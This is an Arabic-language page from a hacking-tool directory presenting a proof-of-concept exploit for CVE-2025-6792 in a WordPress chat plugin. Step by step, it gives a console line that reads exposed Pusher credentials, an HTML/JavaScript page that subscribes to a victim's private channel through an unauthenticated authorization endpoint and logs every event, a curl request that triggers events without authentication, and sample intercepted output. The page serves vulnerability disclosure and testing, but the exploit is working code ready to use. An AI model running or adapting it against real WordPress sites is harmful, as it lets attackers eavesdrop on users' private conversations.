Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6792 — استغلال إثبات المفهوم لـ CVE-2025-6792 يُظهر الاشتراك غير المصرح به في قناة Pusher والتنصت على الأحداث في إضافة WordPress عبر بيانات اعتماد مكشوفة ونقاط نهاية API غير موثقة. | Kitploit
أدوات/GitHubGitHub/jfriedli/cve-2025-6792
الاستطلاعالاستغلالاستغلال تطبيقات الويباختبار أمان APIجمع المعلوماتاختبار الاختراق
GitHubjfriedli/cve-2025-6792

CVE-2025-6792

استغلال إثبات المفهوم لـ CVE-2025-6792 يُظهر الاشتراك غير المصرح به في قناة Pusher والتنصت على الأحداث في إضافة WordPress عبر بيانات اعتماد مكشوفة ونقاط نهاية API غير موثقة.

عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة: الاشتراك غير المصرح به في قناة Pusher (التنصت)

1) الحصول على بيانات اعتماد Pusher (من وحدة تحكم المتصفح)

root@kitploit:~
console.log(
  window.wpguppy_scripts_vars.pusherKey,
  window.wpguppy_scripts_vars.pusherCluster
);

2) الاشتراك في قناة خاصة لضحية

root@kitploit:~
<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <title>Pusher Eavesdrop Test</title>
  <script src="https://js.pusher.com/7.4/pusher.min.js"></script>
</head>
<body>
  <h1>Listening on private-user-5</h1>
  <pre id="log"></pre>

  <script>
    const log = msg => {
      const p = document.createElement('div');
      p.textContent = msg;
      document.getElementById('log').appendChild(p);
    };

    const pusher = new Pusher("PUSHER_KEY", {
      cluster: "PUSHER_CLUSTER",
      authEndpoint: "http://localhost/wordpress/wp-json/guppylite/v2/channel-authorize"
    });

    const channel = pusher.subscribe("private-user-5");

    channel.bind_global((event, data) => {
      log(`Event: ${event} → ${JSON.stringify(data)}`);
    });

    pusher.connection.bind('error', err => {
      log(`Pusher error: ${err.error ? err.error.data : err}`);
    });

    log("Waiting for events...");
  </script>
</body>
</html>

3) تشغيل حدث (بدون مصادقة)

root@kitploit:~
curl -i -X POST "http://localhost/wordpress/?rest_route=/guppylite/v2/user-typing" \
  -H "Content-Type: application/json" \
  -d '{
    "chatId": "5_1",
    "chatType": 1,
    "text": "typing...",
    "userName": "Alice",
    "senderId": 5
  }'

4) ملاحظة البيانات المعترضة

root@kitploit:~
Event: isTyping → {
  "chatId":"5_1",
  "chatType":1,
  "text":"typing...",
  "userName":"Alice",
  "senderId":5
}
تنزيل الأداة